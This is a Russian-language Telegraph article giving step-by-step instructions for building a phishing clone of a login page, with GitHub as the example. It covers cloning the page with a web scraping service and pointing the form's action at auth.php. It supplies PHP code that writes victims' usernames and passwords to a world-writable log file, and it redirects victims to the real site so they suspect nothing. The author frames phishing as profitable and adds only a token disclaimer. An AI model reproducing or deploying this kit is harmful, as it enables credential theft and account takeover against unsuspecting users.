Фишинг

Фишинг

OktaV


Всем привет, мои друзья! В этой статье я хочу вам рассказать о том, как можно создай фишинг из любого сайта. Кто не знает, фишинг это клон какой-то страницы с авторизацией, например гитхаб, вк или почты. Погнали!

Я никого ни к чему не призываю, статья написана в ознакомительных целях!

Теория об фишинге

Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фейковый сайт и ввели свои данные. Социальная инженерия.

Приступим к первому этапу

Итак, для начала ищем авторизацию на нужном нам сайте, я буду приводить в пример гитхаб, получается вот эта ссылка - https://github.com/login


Для РИПа (клонирования) будем использовать сервис - WebParse

Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:

Onion.net

После клонирования вам на почту придёт письмо с ссылкой на архив со страницей:

Onion.net
Onion.net

Второй этап

Скачали, распаковали. Теперь нам нужно реализовать сохранение введённых паролей. За это отвечает параметр action, нам нужно его изменить:

Onion.net

Меняем его на auth.php

На скрине параметр уже изменён.

Теперь в папке с html файлом создаём auth.php и папку base:

Onion.net

Открываем auth.php в текстовом редакторе (я юзаю NotePad++.) и добавляем следующий код:

<?php
file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND);
?>

file_put_contents функция для записи данных в файл, base/ds_logs.txt - путь к файлу, где сохранятся пароли, FILE_APPEND - указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

Теперь загружаем всё это дело на хостинг, а папке base даём права 777

Onion.net

Переходим на сайт и вводим данные, они сохранятся по ссылке: вашдомен.com/base/ds_logs.txt

Название папки и имя .txt файла можно поменять в auth.php

Пароли сохраняются, но после попытки авторизоваться ничего не происходит, поэтому добавим в auth.php следующее:

header('Location: https://github.com/session');

После ввода логина и пароля, жертва переместится по ссылке github.com/session тем временем у нас:

Onion.net

На этом статья подходит к концу, для полноты картины можно было сверстать простую админку с авторизацией, блекджеком и шлюхами.


Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org